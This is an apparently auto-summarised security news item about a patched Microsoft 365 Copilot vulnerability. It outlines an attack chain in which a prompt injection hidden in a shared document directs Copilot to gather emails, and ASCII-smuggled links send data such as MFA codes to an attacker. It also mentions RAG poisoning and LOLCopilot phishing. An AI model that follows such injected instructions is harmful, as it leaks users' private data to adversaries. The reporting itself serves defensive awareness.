Microsoft Fixes ASCII Smuggling Flaw That Enabled Data Theft from Microsoft 365 Copilot

Microsoft Fixes ASCII Smuggling Flaw That Enabled Data Theft from Microsoft 365 Copilot

August 27, 2024 at 02:27AM

A now-patched vulnerability in Microsoft 365 Copilot allowed for theft of sensitive user information using ASCII smuggling. Attack methods included prompting injection, data exfiltration via hidden links, and exploiting AI tools. Microsoft addressed the issue after responsible disclosure in January 2024, yet risks in AI tools persist, emphasizing the need for vigilance and security controls.

After reviewing the meeting notes, it’s clear that there was a discussion about a now-patched vulnerability in Microsoft 365 Copilot. The vulnerability involved the use of a technique called ASCII smuggling to potentially steal sensitive user information.

The attack involved multiple steps, including triggering prompt injection via malicious content concealed in a document shared on the chat, using a prompt injection payload to instruct Copilot to search for more emails and documents, and leveraging ASCII smuggling to entice the user into clicking on a link to exfiltrate valuable data to a third-party server.

The outcome of the attack was the potential transmission of sensitive data present in emails, including multi-factor authentication (MFA) codes, to an adversary-controlled server. Microsoft has addressed the issues following responsible disclosure in January 2024.

It was also noted that proof-of-concept attacks have been demonstrated against Microsoft’s Copilot system to manipulate responses, exfiltrate private data, and dodge security protections. The need for monitoring risks in artificial intelligence (AI) tools was highlighted, particularly in relation to retrieval-augmented generation (RAG) poisoning and indirect prompt injection leading to remote code execution attacks that can fully control Microsoft Copilot and other AI apps.

Furthermore, there was discussion about LOLCopilot, a red-teaming technique that allows an attacker with access to a victim’s email account to send phishing messages mimicking the compromised users’ style. Additionally, it was mentioned that publicly exposed Copilot bots lacking any authentication protections could be an avenue for threat actors to extract sensitive information, assuming they have prior knowledge of the Copilot name or URL.

Finally, it was suggested that enterprises should evaluate their risk tolerance and exposure to prevent data leaks from Copilots and enable Data Loss Prevention and other security controls accordingly to control creation and publication of Copilots.

Overall, the meeting notes highlighted the importance of addressing and preventing vulnerabilities in AI tools like Microsoft Copilot and the potential risks associated with data exfiltration and phishing attacks.

Full Article